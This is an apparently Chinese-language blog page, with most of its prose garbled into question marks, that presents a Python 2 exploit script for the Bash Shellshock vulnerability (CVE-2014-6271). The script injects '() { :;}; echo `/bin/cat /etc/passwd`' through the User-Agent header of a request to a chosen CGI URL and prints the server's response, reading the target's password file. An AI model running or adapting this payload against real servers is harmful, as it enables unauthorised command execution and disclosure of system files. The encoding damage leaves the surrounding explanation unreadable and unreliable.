Bash?????????????(CVE-2014-6271)????????
???????????? ???????[ 2014/12/8 9:25:29 ] ??????????????? WEB???? ???????
????????Bash?????????????????????(CVE-2014-6271)??????μ???isc???????????????£?д???python?汾?????С?????????????
#coding:utf-8
import urllib??httplib
import sys??re??urlparse
#author:nx4dm1n
#website:http://www.nxadmin.com
def bash_exp(url):
urlsp=urlparse.urlparse(url)
hostname=urlsp.netloc
urlpath=urlsp.path
conn=httplib.HTTPConnection(hostname)
headers={"User-Agent":"() { :;}; echo `/bin/cat /etc/passwd`"}
conn.request("GET"??urlpath??headers=headers)
res=conn.getresponse()
res=res.getheaders()
for passwdstr in res:
print passwdstr[0]+':'+passwdstr[1]
if __name__=='__main__':
#??http
if len(sys.argv)<2:
print "Usage: "+sys.argv[0]+" http://www.nxadmin.com/cgi-bin/index.cgi"
sys.exit()
else:
bash_exp(sys.argv[1])
??????????Ч??????????
????bash???????
???????????burp???в????
???????????????????????????飬д??pythonС???????????cat /etc/passwd????????з??????????????????????shell?????п??????????????????????????????????????Щ???????????????????????
??????
???·???
??????????????????
2023/3/23 14:23:39???д?ò??????????
2023/3/22 16:17:39????????????????????Щ??
2022/6/14 16:14:27??????????????????????????
2021/10/18 15:37:44???????????????
2021/9/17 15:19:29???·???????·
2021/9/14 15:42:25?????????????
2021/5/28 17:25:47??????APP??????????
2021/5/8 17:01:11